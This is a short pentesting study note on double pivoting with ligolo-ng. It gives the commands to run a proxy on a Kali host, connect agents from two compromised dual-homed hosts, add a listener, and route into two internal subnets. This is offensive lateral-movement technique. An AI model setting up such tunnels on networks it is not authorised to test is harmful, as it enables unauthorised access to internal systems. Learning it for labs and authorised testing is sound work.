![[images/Pasted image 20251024092956.png]] # Sequence Conceptualized 1) Kali host connects to pivot_host_A (e.g., a router or DMZ host), which is dual homed in external network and internal_subnet_A 2) Setup `ligol-ng` proxy on Kali host 3) Setup pivot_A between Kali host and pivot_host_A to access internal_subnet_A by adding `ligolo-ng` agent_A to pivot_host_A 4) From Kali host, attach to session_A and create tunnel to internal_subnet_A 5) Now we have access to internal_subnet_A from Kali host 6) Move further into network to pivot_host_B, which is dual homed in internal_subnet_A and internal_subnet_B 7) Setup pivot_B between pivot_host_A and pivot_host_B to access internal_subnet_B by adding `ligolo-ng` agent_B to pivot_host_B 8) Also, add a listener to pivot_host_A to shuttle traffic therebetween 9) From Kali host, attach to session_B and create tunnel to internal_subnet_B 1) Only one session/tunnel can be active at a time within `ligolo-ng` 10) Now we have access to internal_subnet_B from Kali host (but not internal_subnet_A) ![[images/Pasted image 20251024082140.png]] # Kali Host ## Initial Setup - Start `ligolo-ng` proxy binary on Kali host ```bash sudo ./proxy -selfcert ``` ![[images/Pasted image 20251023154657.png]] ## Create Tunnel to subnet_A - After initializing agent_A, attach to session associated with agent_A and autoroute to create a tunnel to subnet_A ![[images/Pasted image 20251023154754.png]] - Confirm interface and route ```bash ip a ip route list ``` ![[images/Pasted image 20251023154837.png]] ## Create Listener to Bridge Subnets A & B - Add listener associated with agent_A within `ligolo-ng` window ```bash ligolo-ng >> listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:11601 ``` ![[images/Pasted image 20251024103608.png]] - Confirm listener within `ligolo-ng` window ```bash ligolo-ng >> listener_list ``` ## Create Tunnel to subnet_B - After initializing agent_B attach to session associated with agent_B and manually setup interface & route for Agent_B ```bash interface_create --name double route_add --name double --route 172.16.6.0/24 tunnel_start --tun double ``` ![[images/Pasted image 20251024105236.png]] - Confirm interface and route ```bash ip a ip route list ``` # Pivot_Host_A - Move appropriate `ligolo-ng` agent binary to pivot_host_A - Connect agent_A to Kali host ```bash ./agent -connect <kali_host_ip>:11601 -ignore-cert ``` ![[images/Pasted image 20251023154723.png]] # Pivot_Host_B - Move appropriate `ligolo-ng` agent binary to pivot_host_B - Connect agent_B to agent_A listener ```bash # connect to IP address of pivot_host_A that is on the common subnet for pivot hosts A & B ./agent --connect <internal_ip_pivot_host_A>:4444 ``` ![[images/Pasted image 20251024103741.png]]